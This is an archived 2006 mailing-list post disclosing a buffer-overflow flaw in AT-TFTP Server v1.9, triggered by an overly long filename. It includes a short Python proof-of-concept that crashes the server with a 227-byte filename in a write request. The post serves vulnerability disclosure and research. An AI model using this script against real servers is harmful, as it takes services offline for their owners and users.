Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long fil

from [liuqx] Network Security [Permanent Link]
Subject: TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename)
Date: 26 Nov 2006 12:30:41 -0000 
TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename)

------------------------------------------------------------------
SUMMARY:

AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
(http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp) 
It provides an implementation of the TFTPv2 protocol.

A vulnerability has been identified in TFTP Server AT-TFTP Server v1.9, which 
could be exploited by remote or local attackers to execute arbitrary commands 
or cause a denial of service. This flaw is due to a buffer overflow error when 
handling an overly long file name (more than 227 bytes) passed to a "GET" or 
"PUT" command, which could be exploited by malicious users to compromise a 
vulnerable system or crash an affected application.
----------
DETAILS:

 Vulnerable systems: AT-TFTP Server v 1.9 and probable prior
 
Exploit:

#!/usr/bin/python
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except: 
    print "socket() failed"         
    sys.exit(1)

filename = "A" * 227 
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))

------------------------------------------
Liu Qixu
NCNIPC
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename), liuqx <=
Previous by Date:  Re: Re: "Which is more secure? Oracle vs. Microsoft" (is it a fair comparison?), Tim Newsham
Next by Date:  Clickblog Sql Injection, Advisory
Previous by Thread:  [Full-disclosure] rPSA-2006-0219-1 info install-info texinfo, rPath Update Announcements
Next by Thread:  Clickblog Sql Injection, Advisory
Indexes:  [Date] [Thread] [Top] [All Lists]